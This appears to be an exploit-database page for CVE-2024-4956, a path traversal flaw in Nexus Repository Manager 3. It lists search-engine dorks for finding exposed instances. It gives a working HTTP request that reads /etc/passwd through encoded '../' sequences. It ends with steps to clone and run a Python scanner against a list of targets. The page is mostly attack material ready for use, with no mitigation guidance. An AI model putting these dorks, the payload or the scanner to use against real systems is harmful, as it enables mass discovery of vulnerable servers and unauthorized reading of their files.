Share
## https://sploitus.com/exploit?id=99B1A333-9F18-5581-8193-4DAB1C2FCCE7
#ย # CVE-2024-4956 : Nexus Repository Manager 3
Dork:
- Shodan:http.html:"Nexus Repository"
- Hunter:product.name="Nexus Repository"
- FOFA:app="Nexus-Repository-Manager"
Poc :
```
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
```
![1](https://github.com/GoatSecurity/CVE-2024-4956/assets/153397256/610e851b-2c77-4aa1-9fd2-bd8ffcfae264)
Or you can use this python script for multi scan :
!Put your targets in targets.txt
```
git clone https://github.com/GoatSecurity/CVE-2024-4956.git
cd CVE-2024-4956
pip install -r requirements.txt
python scan.py
```
![Screenshot](https://github.com/GoatSecurity/CVE-2024-4956/assets/153397256/3b939643-a388-4fe3-8922-4c49b6236b84)